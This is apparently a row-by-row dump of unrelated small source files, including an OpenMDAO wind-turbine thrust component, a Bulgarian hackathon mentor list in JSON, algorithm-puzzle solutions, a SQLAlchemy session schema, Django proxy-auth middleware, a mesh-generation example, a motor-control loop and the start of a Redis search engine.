            'descripcion': self.descripcion
        }
991,632 | 712c89b34ac831954498a5e71f1ec68a50b5379c | from openmdao.api import ExplicitComponent
import numpy as np
from input_params import max_n_turbines
class AbstractThrustCoefficient(ExplicitComponent):
    """OpenMDAO component computing thrust coefficients around turbine ``number``.

    Subclasses must provide ``self.ct_model(u)`` mapping a wind speed to a
    thrust coefficient -- it is not defined on this abstract base.
    """

    def __init__(self, number, n_cases):
        # number: index of the turbine this component belongs to.
        # n_cases: number of inflow cases evaluated per run.
        super(AbstractThrustCoefficient, self).__init__()
        self.number = number
        self.n_cases = n_cases

    def setup(self):
        self.add_input('n_turbines', val=0)
        self.add_input('prev_ct', shape=(self.n_cases, max_n_turbines - 1))
        for n in range(max_n_turbines):
            if n < self.number:
                # Wind speeds at the turbines upstream of this one only.
                self.add_input('U{}'.format(n), shape=self.n_cases)
        self.add_output('ct', shape=(self.n_cases, max_n_turbines - 1))
        # Finite difference all partials.
        # self.declare_partials('*', '*', method='fd')

    def compute(self, inputs, outputs):
        """Fill ``ct`` per case: copy upstream coefficients, recompute this turbine's.

        For each case, the first ``self.number`` entries are built (only when
        ``self.number < n_turbines``): all are copied from ``prev_ct`` except
        index ``self.number - 1``, which is recomputed from the wind speed via
        ``ct_model``; the row is then zero-padded to max_n_turbines - 1.
        """
        # print "2 Thrust"
        # for n in range(max_n_turbines):
        #     if n != self.number:
        #         print inputs['U{}'.format(n)], "Input U{}".format(n)
        ans = np.array([])
        for case in range(self.n_cases):
            n_turbines = int(inputs['n_turbines'])
            c_t = np.array([])
            prev_ct = inputs['prev_ct'][case]
            for n in range(n_turbines):
                if n < self.number < n_turbines:
                    if n == self.number - 1:
                        print "called ct_model"
                        c_t = np.append(c_t, [self.ct_model(inputs['U{}'.format(n)][case])])
                    else:
                        c_t = np.append(c_t, [prev_ct[n]])
            # Zero-pad the row up to the fixed output width.
            lendif = max_n_turbines - len(c_t) - 1
            # print c_t
            c_t = np.concatenate((c_t, [0 for _ in range(lendif)]))
            ans = np.append(ans, c_t)
        ans = ans.reshape(self.n_cases, max_n_turbines - 1)
        # print ans
        outputs['ct'] = ans
        # print ans, "Output Ct"
if __name__ == '__main__':
    from openmdao.api import Problem, Group, IndepVarComp

    # Minimal smoke-test harness.
    # NOTE(review): no 'thrust' subsystem is ever added to the model, so the
    # connect() below and prob['thrust.Ct'] will fail as written -- this block
    # appears to predate a rename; confirm before relying on it.
    model = Group()
    ivc = IndepVarComp()
    ivc.add_output('u', 7.0)
    model.add_subsystem('indep', ivc)
    model.connect('indep.u', 'thrust.u')
    prob = Problem(model)
    prob.setup()
    prob.run_model()
    print(prob['thrust.Ct'])
991,633 | f72c14c25f6f7954663b449b2af74ca3216ec458 | [{"id":76,"name":"Анна-Мария Ангелова","description":"<p>Анна-Мария Ангелова е завършила Американския университет в България, където именно се запалва искрата към анализирането на данните и предприемачеството. През последните 5 г. тя взима участие в няколко проекта за иновации в Исландия и Дания, работи за един стартъп и активно се ангажира с разработването и реализирането на някои от най-обещаващите хъбове на Балканите, сред които организирането на световните форуми StartUP конференция, StartUP Weekend в България и AdventureNEXT в Македония.</p>\r\n\r\n<p>По време на следването си Анна-Мария работи по няколко Big Data проекта. В Experian тя се занимава с моделиране на данни, като фокусът е върху разрешаването на проблеми, свързани с стратегически маркетинг и управление на риска.</p>","picture":"./Anna-Maria_Angelova.jpg","teams":[{"id":268,"name":"Линейно Сортиране","room":"321"},{"id":266,"name":"Kappa","room":"100"},{"id":273,"name":"Д3В Machines","room":"307"},{"id":263,"name":"#WhatHacKeriWillSay","room":"1"},{"id":281,"name":"Pestering Petabytes","room":"304"},{"id":279,"name":"HackFMI Dream Team","room":"305"}]},{"id":77,"name":"Мартин Йотов","description":"<p>Мартин Йотов вече 2 години работи в Experian, в отдела Regional Analytics Group. Притежава бакалавърска степен по Финанси и магистърска по Банково дело и международни финанси от Университетът за национално и световно стопанство.</p>\r\n\r\n<p>Силата му е в скриптиране, решаване на проблеми и управление на времето. Ако имате проблем, който може да се реши дедуктивно или индуктивно и чрез креативно мислене, той може да ви бъде от голяма полза.</p>","picture":"./Martin_Yotov.jpg","teams":[{"id":266,"name":"Kappa","room":"100"}]},{"id":78,"name":"Владимир Алексиев","description":"<p>Владимир Алексиев е съосновател и CTO на Perpetto.</p>\r\n\r\n<p>Perpetto e 3-тата компания, която Владо стартира и в последните близо 3 години е напълно отдаден на нея. 
Работата му е свързана основно със събиране и анализиране на данни.</p>\r\n\r\n<p>Владо ще може да ви помогне с:</p>\r\n\r\n<ul>\r\n\t<li>Ruby / Rails</li>\r\n\t<li>PHP</li>\r\n\t<li>Programming languages in general</li>\r\n\t<li>Algorithms</li>\r\n\t<li>Database design</li>\r\n\t<li>Architecture</li>\r\n\t<li>How to turn your idea into business</li>\r\n\t<li>Presentation skills</li>\r\n</ul>","picture":"./vlad_1.jpg","teams":[{"id":277,"name":"Далеци'","room":"326"},{"id":274,"name":"Племето","room":"321"},{"id":260,"name":"counter productive unit","room":"308"},{"id":262,"name":"#RoboLove","room":"307"},{"id":265,"name":"OK, Hacker","room":"305"},{"id":280,"name":"2b|!2b","room":"02"}]},{"id":79,"name":"Явор Стойчев","description":"<p>Явор Стойчев е софтуерен архитект и съосновател на Perpetto. Преди това е бил софтуерен инженер в Amazon и Transmetrics.</p>\r\n\r\n<p>Явор може да ви помогне с:</p>\r\n\r\n<ul>\r\n\t<li>Distributed Systems & Big Data - Spark, Hadoop, Hbase, Elasticsearch</li>\r\n\t<li>Machine Learning</li>\r\n\t<li>Java, Scala</li>\r\n\t<li>Ruby on Rails</li>\r\n\t<li>Python</li>\r\n\t<li>Designing Systems for Failure</li>\r\n\t<li>Design Patterns</li>\r\n</ul>","picture":"./yavor_1.jpg","teams":[{"id":262,"name":"#RoboLove","room":"307"},{"id":265,"name":"OK, Hacker","room":"305"},{"id":279,"name":"HackFMI Dream Team","room":"305"},{"id":278,"name":"Дзверозаври","room":"mazata"}]},{"id":80,"name":"Атанас Благоев","description":"<p>Само на 25 г., но вече успял за прекара последните 7 години в иновационни хъбове като Амстердам и Лондон, Атанас Благоев ще допринесе за вашия отбор с дълбоки познания в сферата на маркетинга и опит в тяхното прилагане.</p>\r\n\r\n<p>В момента Атанас е Junior Data Modeler в Experian, където придобива знания за пазара на продукти, които са задвижвани от данни. 
</p>","picture":"./Atanas_Blagoev.jpg","teams":[{"id":279,"name":"HackFMI Dream Team","room":"305"}]},{"id":81,"name":"Павел Калоферов","description":"<p>Павел е участвал на 2 хакатона в Англия – единият път е бил част от отбора-победител, а другият е бил на трето място. В момента Павел работи като Junior Data Modeler в Experian, което е и ясен сигнал за неговите интереси в областта на данните.</p>\r\n\r\n<p>Освен това, той е съосновател на стартъп, който в момента оперира на пазара. Така че, в лицето на Павел ще откриете човек, който познава трудностите в развиването на нова идея и който ще може да ви даде нетривиални съвети как да бъдете по-ефикасни.</p>","picture":"./Pavel_Kaloferov.jpg","teams":[]},{"id":82,"name":"Георги Стоянов","description":"<p>Георги е основател на Lucid - приложение, базирано на machine learning алгоритми, които рендерират снимката ви в картина като от известни художници. Има опит с програмиране, алгоритми, data structures, machine learning, business development и не само. 
Работил е в Google, Microsoft и Uber.</p>\r\n\r\n<p>Може да помага за:</p>\r\n\r\n<ul>\r\n\t<li>Javascript,Python, Java</li>\r\n\t<li>Programming languages in general</li>\r\n\t<li>Algorithms</li>\r\n\t<li>Datastructures</li>\r\n\t<li>Architecture</li>\r\n\t<li>Тensorflow, Scikit, Scrapers & Machine learning</li>\r\n\t<li>How to turn your idea into business</li>\r\n\t<li>Presentation skills</li>\r\n</ul>","picture":"./george_stoyanov.jpg","teams":[{"id":268,"name":"Линейно Сортиране","room":"321"},{"id":266,"name":"Kappa","room":"100"},{"id":274,"name":"Племето","room":"321"},{"id":272,"name":"Asteria","room":"307"},{"id":273,"name":"Д3В Machines","room":"307"},{"id":265,"name":"OK, Hacker","room":"305"},{"id":263,"name":"#WhatHacKeriWillSay","room":"1"},{"id":280,"name":"2b|!2b","room":"02"},{"id":281,"name":"Pestering Petabytes","room":"304"},{"id":279,"name":"HackFMI Dream Team","room":"305"},{"id":278,"name":"Дзверозаври","room":"mazata"}]},{"id":83,"name":"Антон Ненов","description":"<p>Антон е Data Scientist в NetInfo и част от общността - Data Science Society. 
Може да ви помага с различни Data Mining техники - Classification Trees(C 5.0, CHAID...), Clustering (K-means), Time Series (ARIMA), Market Basket(Apriori), Social network Analysis (SNA).</p>\r\n\r\n<p>Има опит с продукти като:</p>\r\n\r\n<ul>\r\n\t<li>SPSS Modeler (old name Clementine)</li>\r\n\t<li>R (R studio)</li>\r\n\t<li>Orange (<a href=\"http://orange.biolab.si/\" target=\"_blank\">http://orange.biolab.si/</a>)</li>\r\n\t<li>Google Analytics и Тableau</li>\r\n</ul>","picture":"./anton_nenov.jpg","teams":[{"id":268,"name":"Линейно Сортиране","room":"321"},{"id":265,"name":"OK, Hacker","room":"305"},{"id":283,"name":"Algosquad","room":"2"}]},{"id":84,"name":"Михаил Жеков","description":"<p>Михаил е SAP Mobile Developer в Sqilline.</p>\r\n\r\n<p>Той може да помага за:</p>\r\n\r\n<ul>\r\n\t<li>Java</li>\r\n\t<li>C/C++</li>\r\n\t<li>Programming languages in general</li>\r\n\t<li>Algorithms</li>\r\n\t<li>Architecture</li>\r\n</ul>","picture":"./Mihail_Jekov.jpg","teams":[{"id":268,"name":"Линейно Сортиране","room":"321"},{"id":263,"name":"#WhatHacKeriWillSay","room":"1"}]},{"id":85,"name":"Веселин Истатков","description":"<p>Веско е Technical Team Leader Sqilline, завършил ФМИ, има опит с множество проекти като Developer, Software Architect и Project Manager.</p>\r\n\r\n<p>Може да ви бъде полезен с:</p>\r\n\r\n<ul>\r\n\t<li>как да превърнете идеята си в готов продукт за представяне;</li>\r\n\t<li>множество технологии и езици за програмиране;</li>\r\n\t<li>алгоритми;</li>\r\n\t<li>презентационни умения;</li>\r\n\t<li>управление на обхвата и времето на проекта.</li>\r\n</ul>","picture":"./Vesko-sqilline.jpg","teams":[{"id":263,"name":"#WhatHacKeriWillSay","room":"1"}]},{"id":87,"name":"Десислава Василева","description":"<p>Десислава е Senior Data Modeler в Experian. Има над 5-години опит в сферата като през последните 3 години е част от екипа на Experian. 
Освен това, в момента учи Статистика, иконометрия и актюерство в Софийския университет.</p>\r\n\r\n<p>По време на следването си за бакалавърска степен учи и в университети Metropolitan University Prague и University of Wisconsin – Eau Claire. </p>","picture":"./DesislavaVasileva_Picture.jpg","teams":[{"id":278,"name":"Дзверозаври","room":"mazata"},{"id":283,"name":"Algosquad","room":"2"}]},{"id":88,"name":"Павел Геневски","description":"<p>Павел е Senior Researcher в SAP Labs Bulgaria.</p>\r\n\r\n<p>Той може да помогне на вашия отбор с:</p>\r\n\r\n<ul>\r\n\t<li>Развиване на идеята, product research, разработка, UX, презентационни умения</li>\r\n\t<li>Frontend: HTML/CSS/JavaScript, Twitter bootstrap, reactjs, gulp, karma, jasmine, Android</li>\r\n\t<li>Backends: NodeJS, Java, PHP, nginx, Tomcat, SQL, PostgreSQL, Linux, Docker, Security</li>\r\n\t<li>(Big)Data science: Spark, Hive, Kafka, Cassandra, Zeppelin, SQL, R, Information Retrieval, NLTK, Bash, awk/grep</li>\r\n</ul>","picture":"./image003.jpg","teams":[{"id":273,"name":"Д3В Machines","room":"307"},{"id":266,"name":"Kappa","room":"100"}]},{"id":89,"name":"Добромир Захариев","description":"<p>Добромир е<strong> </strong>Senior Developer and Product Owner в SAP Labs Bulgaria.</p>\r\n\r\n<p>Той може да помогне с:</p>\r\n\r\n<ul>\r\n\t<li>Development and architecture - always curious about best practices and code excellence.<br />\r\n\tEnjoys dynamic programming and optimization algorithms.</li>\r\n\t<li>Recently used languages – от Java до Swift, Objective-C и bash</li>\r\n\t<li>Experiments with virtualization – VirtualBox и Monsoon </li>\r\n</ul>","picture":"./dobromir-zahariev.jpg","teams":[]},{"id":90,"name":"Божидар Божанов","description":"<p>Божидар е софтуерен инженер и архитект с 10 години опит, основно Java-технологии. 
В момента съветник по въпросите на електронното управление на вицепремиера, с фокус върху архитектурата на електронното управление и отворените данни.</p>\r\n\r\n<p>Може да помага за:</p>\r\n\r\n<ul>\r\n\t<li>Намиране на подходящи данни</li>\r\n\t<li>Работа с данни (изчистване, моделиране, оптимизиране)</li>\r\n\t<li>Общи програмистки насоки, избор на инструменти</li>\r\n</ul>","picture":"./bozhidar_bozhanov.jpg","teams":[{"id":277,"name":"Далеци'","room":"326"},{"id":268,"name":"Линейно Сортиране","room":"321"},{"id":273,"name":"Д3В Machines","room":"307"},{"id":280,"name":"2b|!2b","room":"02"},{"id":278,"name":"Дзверозаври","room":"mazata"},{"id":283,"name":"Algosquad","room":"2"}]},{"id":91,"name":"Георги Къдрев","description":"<p>Като ученик и студент Георги е лауреат на множество състезания по програмиране и информационни технолигии.<br />\r\nСлед като завършва бакалавърската си степен основава Imagga, технологична копмания прилагаща машинно самообучение за целите на разпознаване на обекти и сцени в цифрови снимки. Технологията се предлага под формата на програмен интерфейс (API), който разработчиците могат да вграждат в приложенията си работещи със снимки. 
Копманията е носител на множество национални, регионални и световни отличия, включително и "Глобален иноватор в областта на анализ на изображения" за 2016 г.</p>\r\n\r\n<p><br />\r\nГеорги може да бъде полезен с:</p>\r\n\r\n<ul>\r\n\t<li>Практически опит в областта на машинното самобучение и анализ на изображения</li>\r\n\t<li>Съвети за оформянето на бизнес концепция базирана на технологии</li>\r\n</ul>","picture":"./Georgi-Kadrev-big-face.jpg","teams":[{"id":268,"name":"Линейно Сортиране","room":"321"},{"id":274,"name":"Племето","room":"321"},{"id":272,"name":"Asteria","room":"307"},{"id":265,"name":"OK, Hacker","room":"305"},{"id":263,"name":"#WhatHacKeriWillSay","room":"1"},{"id":278,"name":"Дзверозаври","room":"mazata"},{"id":283,"name":"Algosquad","room":"2"}]},{"id":92,"name":"Илиян Ненов","description":"<p>Илиян е Senior Product Manager в SAP Labs Bulgaria.</p>\r\n\r\n<p>Може да разчитате на него за:</p>\r\n\r\n<ul>\r\n\t<li>Generating pitching and presenting ideas, design thinking, defining minimum viable product</li>\r\n\t<li>Machine Learning: TensorFlow, Keras, Python, Octave/MATLAB</li>\r\n\t<li>Big-data: Data pre-processing, NoSQL</li>\r\n</ul>","picture":"./Iliyan.jpg","teams":[{"id":272,"name":"Asteria","room":"307"},{"id":265,"name":"OK, Hacker","room":"305"},{"id":278,"name":"Дзверозаври","room":"mazata"},{"id":283,"name":"Algosquad","room":"2"}]},{"id":93,"name":"Георги Налбантов","description":"<p>Георги има PhD по Иконометрика и Компютърни науки от Еразмус Университет в Ротердам. Той има повече от 10 г. опит с анализи, с фокус върху секторите финанси, здравеопазване, маркетинг, life science и енергетика. Георги е преподавател в СУ, Факултет по Икономика и Бизнес Администрация Economics и преподава на магистри "Statistical Learning for Big Data". 
</p>\r\n\r\n<p>Инструментите му за прогнозно моделиране включват R, Matlab, Python, SPSS, Weka.</p>\r\n\r\n<p> </p>","picture":"./george-sqilline.jpg","teams":[{"id":283,"name":"Algosquad","room":"2"}]},{"id":94,"name":"Марио Стоилов","description":"<p>Като ученик ходи по олимпиади, а като студент започва работа след първи курс. Това прави сборно около 6-7 години занимаване с програмиране. Сред технологиите, с които e работил Марио са: .Net (C#), Java, JavaScript, golang, SQL, Ruby, C/C++ и много други.</p>\r\n\r\n<p>На отборите може да помага с:</p>\r\n\r\n<ul>\r\n\t<li>Aрхитектурата на приложението, което конструират </li>\r\n\t<li>Насоки към самата цел, която искат да постигнат те</li>\r\n</ul>","picture":"./Mario_Stoilov_Whd9Xas.jpg","teams":[{"id":266,"name":"Kappa","room":"100"},{"id":262,"name":"#RoboLove","room":"307"}]},{"id":95,"name":"Томо Симеонов","description":"<p>Томо се занимава с програмиране от почти 10 години - професионално повече от 3 години, като това време е разделено между инвестмънт банка в Лондон и VMware. Участвал е и преди на хакатони като на един от тях е бил сред победителите. </p>\r\n\r\n<p>На отборите може да бъде полезен с:</p>\r\n\r\n<ul>\r\n\t<li>Python , Java, Design Patterns</li>\r\n\t<li>Архитектура като цяло, насоки да станат победители</li>\r\n</ul>","picture":"./TomoSimeonov.bmp","teams":[{"id":273,"name":"Д3В Machines","room":"307"}]}] |
991,634 | d6425a409c07102385c877a20b4e71caa075fe7a | # 2020 카카오 인턴십2 수식 최대화
# https://programmers.co.kr/learn/courses/30/lessons/67257
from itertools import permutations
def solution(expression):
    """Return the maximum |result| obtainable by evaluating *expression*
    under some total precedence ordering of the operators '+', '-', '*'.

    2020 Kakao internship problem "수식 최대화": try every permutation of
    operator precedence, evaluate left-to-right within equal precedence,
    and keep the largest absolute value.

    :param expression: string of non-negative integers joined by +, -, *
    :return: maximum absolute value over all 6 precedence orderings
    """
    operators = ['+', '-', '*']
    # Split out the numbers once; the operator sequence is read in order.
    operands = expression.replace('+', ' ').replace('-', ' ').replace('*', ' ').split()
    ops = [ch for ch in expression if ch in operators]
    # Explicit operator table instead of eval() on concatenated strings.
    apply_op = {
        '+': lambda a, b: a + b,
        '-': lambda a, b: a - b,
        '*': lambda a, b: a * b,
    }
    best = 0
    for order in permutations(operators):
        nums = [int(x) for x in operands]
        cur_ops = ops.copy()
        # Collapse operators in precedence order; within one precedence
        # level, always reduce the leftmost occurrence first.
        for op in order:
            while op in cur_ops:
                idx = cur_ops.index(op)
                del cur_ops[idx]
                result = apply_op[op](nums[idx], nums[idx + 1])
                nums[idx:idx + 2] = [result]
        best = max(best, abs(nums[0]))
    return best
if __name__ == "__main__":
    # Smoke-check against the sample cases from the problem statement.
    print(solution("100-200*300-500+20")) # 60420
    print(solution("50*6-3*2")) # 300
|
991,635 | c4eaa8f0d3324ccd1baee1add89950fba4c986b6 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright [2017] Tatarnikov Viktor [viktor@tatarnikov.org]
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from Scopuli.Interfaces.MySQL.SQLAlchemy import *
from Scopuli.Interfaces.MySQL.Schema.Core import File, Image
from Scopuli.Interfaces.MySQL.Schema.Core.User import User
from Scopuli.Interfaces.MySQL.Schema.Web.Core import WebSite, WebPage
import json
class WebModuleSession(Base, Schema):
    """
    Table holding the list of user web sessions.

    Besides the fixed columns, arbitrary per-session key/value data is kept
    in the ``user_parms`` text column as a JSON blob, accessed through
    :meth:`get_property` / :meth:`set_property`.
    """
    __tablename__ = 'web_module_session'
    __table_args__ = {
        'mysql_engine' : 'InnoDB',
        'mysql_charset': 'utf8',
        'mysql_collate': 'utf8_general_ci',
        'mysql_comment': 'Таблица с перечнем пользовательских сессий'
    }
    id = Column(Integer(), primary_key=True, autoincrement=True, doc="Row ID - Сурогатный ключ")
    cd_web_site = Column(Integer(), ForeignKey(WebSite.id), index=True, nullable=False, doc="Ссылка на WebSite")
    cd_web_page = Column(Integer(), ForeignKey(WebPage.id), nullable=True, doc="Ссылка на WebPage")
    cd_user = Column(Integer(), ForeignKey(User.id), nullable=True, doc="Ссылка на User")
    request_url = Column(String(256), ColumnDefault(""), nullable=False, doc="URL текущей страницы")
    user_agent = Column(String(256), ColumnDefault(""), nullable=False, doc="Agent пользователя")
    user_ip = Column(String(32), ColumnDefault(""), nullable=False, doc="IP адрес пользователя")
    user_parms = Column(Text(2048), ColumnDefault(""), nullable=False, doc="Дополнительные данные сессии")
    # Auto-maintained timestamps: last activity (updated on every write) and login time.
    date_active = Column(DateTime(), nullable=False, default=func.utc_timestamp(), onupdate=func.utc_timestamp(),
                         doc="AutoLogger - Время последней активности")
    date_login = Column(DateTime(), nullable=True, doc="AutoLogger - Время авторизации")
    # Auto-maintained timestamps: row creation and last modification.
    date_create = Column(DateTime(), nullable=False, default=func.utc_timestamp(), doc="AutoLogger - Время создания")
    date_change = Column(DateTime(), nullable=False, default=func.utc_timestamp(), onupdate=func.utc_timestamp(),
                         doc="AutoLogger - Время последнего изменения")
    # Cached parse of the user_parms column as a JSON object (lazily loaded).
    __user_parms_json = None
    def __user_parms_load(self):
        """
        Parse the string value fetched from the DB into a JSON object (once).
        An empty column is normalised to "{}" before parsing.
        :return:
        """
        if self.__user_parms_json is None:
            if self.user_parms == "":
                self.user_parms = "{}"
            self.__user_parms_json = json.loads(self.user_parms)
    def __user_parms_save(self):
        """
        Serialise the cached JSON object back into the string column so it
        is persisted on the next flush.
        :return: Nothing
        """
        if self.__user_parms_json is not None:
            self.user_parms = json.dumps(self.__user_parms_json)
    def get_property(self, name, default=None):
        """
        Read a stored session property from the JSON blob.
        :param name: Parameter name
        :type name: String
        :param default: Value returned when the parameter is absent
        :type default: Any
        :return: Stored value or default
        :rtype: String or default type
        """
        self.__user_parms_load()
        if name in self.__user_parms_json:
            return self.__user_parms_json[name]
        return default
    def set_property(self, name, value):
        """
        Write a session property into the JSON blob and mark it for storage.
        :param name: Parameter name
        :type name: String
        :param value: Value to store
        :type value: String
        :return: Nothing
        :rtype: Nothing
        """
        self.__user_parms_load()
        self.__user_parms_json[name] = value
        self.__user_parms_save()
|
991,636 | e1469a384d153ac65b5f538517abf858cc05107c | # -* encoding: utf-8 *-
from django.contrib.auth.middleware import RemoteUserMiddleware
from django.contrib.auth.backends import RemoteUserBackend
class ProxyRemoteUserMiddleware(RemoteUserMiddleware):
    """
    This authenticates the remote user against the commonly
    used HTTP_REMOTE_USER meta field so that HTTP AUTH
    authentication actually works with gunicorn.
    """
    # Django's stock RemoteUserMiddleware reads the REMOTE_USER environ key;
    # behind a reverse proxy the value arrives as an HTTP header, which WSGI
    # exposes with the HTTP_ prefix.
    header = "HTTP_REMOTE_USER"
class ProxyRemoteUserBackend(RemoteUserBackend):
    """
    This makes sure unknown users don't gain access.
    """
    # Only pre-existing User rows may authenticate; Django will not create
    # an account for an unrecognised remote username.
    create_unknown_user = False
|
991,637 | 164f1d5c27c651cde250962f55591714e92c2b83 | #
# Test script just to make sure it works!
#
# Edited by C. Do on 2014-2-13
import eqsansscript_class_2015Brev1
reload(eqsansscript_class_2015Brev1)
from eqsansscript_class_2015Brev1 import *
{{title}}
{{ipts}}
{{ configuration.absolute_scale_factor }}
{% for entry in entries %}
{{ entry.background_scattering}} {{ entry.background_transmission}} {{ entry.empty_beam}}
{% endfor %}
|
991,638 | 333f13c22ed7813b8badee0f1095d79d3d1640ab | def print_hm(h):
r = len(h)
c = len(h[0])
for i in range(1, r):
for j in range(1, c):
print(h[i][j], end='\t')
print()
class Solution(object):
    """LeetCode 85 "Maximal Rectangle": two DP solutions over a binary
    matrix of '0'/'1' characters (rows may be strings or lists)."""
    def maximalRectangle(self, matrix):
        """
        :type matrix: List[List[str]]
        :rtype: int
        """
        # sol: h[j]*(right[j]-left[j]+1) for i and j
        # Per row, maintain for each column j: h[j] = height of consecutive
        # '1's ending at this row, and [left[j], right[j]] = widest interval
        # in which every column sustains at least that height.
        # complexity: O(n^2)
        # space O(n^2) # input
        r = len(matrix)
        if r == 0: return 0
        c = len(matrix[0])
        h = []
        left = []
        right = []
        res = 0
        for j in range(0, c):
            h.append(0)
            left.append(0)
            right.append(c-1)
        for i in range(0, r):
            left_cur = 0
            right_cur = c-1
            # Extend or reset running column heights for this row.
            for j in range(0, c):
                if matrix[i][j] == '1': h[j]=h[j]+1
                else: h[j]=0
            # Tighten left boundaries (left-to-right sweep).
            for j in range(0, c):
                if matrix[i][j] == '1':
                    left[j] = max(left[j], left_cur)
                    # depends on the most right last row seen, when following the last row height
                else:
                    left[j] = 0 # lower the height here, so not constraint
                    left_cur = j+1 # reset
            # Tighten right boundaries (right-to-left sweep).
            for j in range(c-1, -1, -1):
                if matrix[i][j]=='1':
                    right[j] = min(right_cur, right[j])
                    # depends on the most left last row seen, when following the last row height
                else:
                    right[j] = c-1 # lower the height here, so not constraint
                    right_cur = j-1 #reset
            #print(i, matrix[i], left, right, h)
            # Best rectangle ending at this row for each column.
            for j in range(0, c):
                res_tmp = h[j]*(right[j]-left[j]+1)
                if res_tmp > res: res = res_tmp
        return res
    def maximalRectangle1(self, matrix):
        """
        :type matrix: List[List[str]]
        :rtype: int
        """
        # sol(i,j) = max_{t=1,j} h(i,j-t+1)*t
        # O(n^3) variant: h[i][j] counts consecutive '1's ending at (i, j)
        # going upward (1-indexed with a zero padding row/column); for each
        # cell, widen leftward while tracking the minimum height seen.
        # complexity O(n^3)
        r = len(matrix)
        if r == 0: return 0
        c = len(matrix[0])
        h = []
        res = 0
        for i in range(0, r+1):
            na = []
            for j in range(0, c+1):
                na.append(0)
            h.append(na)
        for i in range(1, r+1):
            for j in range(1, c+1):
                if matrix[i-1][j-1] == '1':
                    h[i][j] = h[i-1][j] + 1
        #print_hm(h)
        for i in range(1, r+1):
            for j in range(1, c+1):
                hs = h[i][j]
                if matrix[i-1][j-1] != '1': continue
                # Widen leftward from j; hs is the limiting height so far.
                for w in range(j, 0, -1):
                    if matrix[i-1][w-1] != '1': break
                    hs = min(hs, h[i][w])
                    #print('i', i, ' j', j, ':' , hs,'x', (j-w+1))
                #print('---')
                    res_tmp = hs * (j-w+1)
                    if res < res_tmp:
                        res = res_tmp
        return res
# Manual check on the classic LeetCode 85 sample matrix (expected output: 6,
# the 2x3 block of '1's spanning rows 1-2, columns 2-4).
a = Solution()
matrix = ["10100","10111","11111","10010"]
#matrix = ["01101","11010","01110","11110","11111","00000"]
print(a.maximalRectangle(matrix))
991,639 | fc384a60dcf113b091e4f1a7b5608594381fd1ef | #Example file to show how to generate mesh with pydistmesh and write it to a file type compatible with fenics
#Alex Martinez-Marchese
# Python imports
import numpy as np
import matplotlib.pyplot as plt
# Local imports
import dolfin as df
import distmesh as dm
#Cone measurements
rad = 0.01
vfr = 0.004
#Functions
def fdout(p):
    # Signed distance to the outer boundary: two circles of radius `rad`
    # centred at (0, 0) and (2*rad, 0), joined by a rectangle (a "stadium").
    return dm.dunion(dm.dunion(dm.dcircle(p,0,0,rad), dm.drectangle(p,0.0,2*rad, -rad,rad)), dm.dcircle(p,2*rad,0,rad))
def fd(p):
    # Signed distance for the meshed domain: the outer shape from fdout()
    # minus two small circular holes of radius `vfr` at the circle centres.
    return dm.ddiff(dm.ddiff(fdout(p), dm.dcircle(p,0,0,vfr)), dm.dcircle(p,2*rad,0,vfr))
def fh(p):
    # Desired-edge-length function: refines the mesh near the outer boundary
    # and near both inner holes (smaller target size close to each feature).
    return dm.dunion(dm.dunion(0.0004-0.3*fdout(p), 0.0004+0.3*dm.dcircle(p,0,0,vfr)), 0.0004+0.3*dm.dcircle(p,2*rad,0,vfr))
#Make mesh
np.random.seed(1) # Always the same results
plt.ion()
p, t = dm.distmesh2d(fd, fh, 0.0004, (-0.01,-0.03, 0.03,0.03), 0.001, [(rad,-rad),(2*rad,-rad), (rad,rad),(2*rad,rad)])
# Write mesh as xml file
numVertices = p.shape[0]
numCells = t.shape[0]
editor = df.MeshEditor()
mesh = df.Mesh()
dim = 2
editor.open(mesh, 2, 2) # top. and geom. dimension are both 3
editor.init_vertices(numVertices) # number of vertices
editor.init_cells(numCells) # number of cells
for x in range(0, numVertices):
editor.add_vertex(x, p[x][:])
for x in range(0, numCells):
editor.add_cell(x, np.array(t[x][:], dtype=np.uintp))
editor.close()
#Plot mesh using dolfin
df.plot(mesh)
df.interactive()
#Write to file
df.File('twovortexmesh.xml') << mesh
|
991,640 | a8fe5081c171ab3e94e3ee6a5dcacad082ef9ed9 | from django.apps import AppConfig
class CostoadminConfig(AppConfig):
    """Django application configuration for the `costoadmin` app."""
    name = 'costoadmin'
|
991,641 | 840901148676ef625045c94c96190243fc48a2da | import roboclaw, time, math
# Ramp the motor command value up from 10 (capped at 120), then back down,
# exiting the loop once it reaches -10.
i = 10
flag = True
while i != -10:
    print(i)
    # Controller 128: M1/M2 forward at i/sqrt(3); controller 129: M1
    # backward at the raw value.
    roboclaw.M2Forward(128,int(round(i/math.sqrt(3.0))))
    roboclaw.M1Forward(128,int(round(i/math.sqrt(3.0))))
    roboclaw.M1Backward(129,i)
    i = i + 10 if flag else i - 10
    if i > 120:
        # Clamp at 120 and switch to ramping down.
        # NOTE(review): the clamp causes 120 to be commanded on two
        # consecutive iterations - confirm that is intended.
        i = 120
        flag = False
    time.sleep(0.05)
|
991,642 | cce4c572881a0fc0c3e6e883921214e5f753eaed | # -*- coding: utf-8 -*-
# Simple Python Search Engine built on Redis
# https://github.com/ebaum/searchpyre
__author__ = 'Eugene Baumstein'
__license__ = 'MIT'
__version__ = '0.1'
import re
import os
import math
import time
import datetime
import collections
import unicodedata
from redis import StrictRedis
from itertools import chain
_NON_WORDS = re.compile("[^a-z0-9' ]")
_KEY = re.compile('(\w+\.\w+)#([0-9]+):?(\w+)?') # 'app.model#1:word'
_ARTICLES = ('the', 'of', 'to', 'and', 'an', 'in', 'is', 'it', 'you', 'that', 'this')
def _unique(seq):
seen = set()
for item in seq:
if item not in seen:
seen.add(item)
yield item
def _get_words(text, weighted=True):
    """Tokenise *text* into index terms (Python 2 code: basestring/unicode).

    With weighted=False return the filtered word list; otherwise map each
    non-numeric word through double metaphone and return a dict of
    term -> relative frequency within the text.
    """
    if not isinstance(text, basestring):
        # Non-string inputs (e.g. numbers) index as a single term.
        return dict([(str(text), 1)])
    words = _NON_WORDS.sub(' ', text.lower()).split()
    # Drop stop words and single-character tokens.
    words = [word for word in words if word not in _ARTICLES and len(word) > 1]
    if not weighted:
        return words
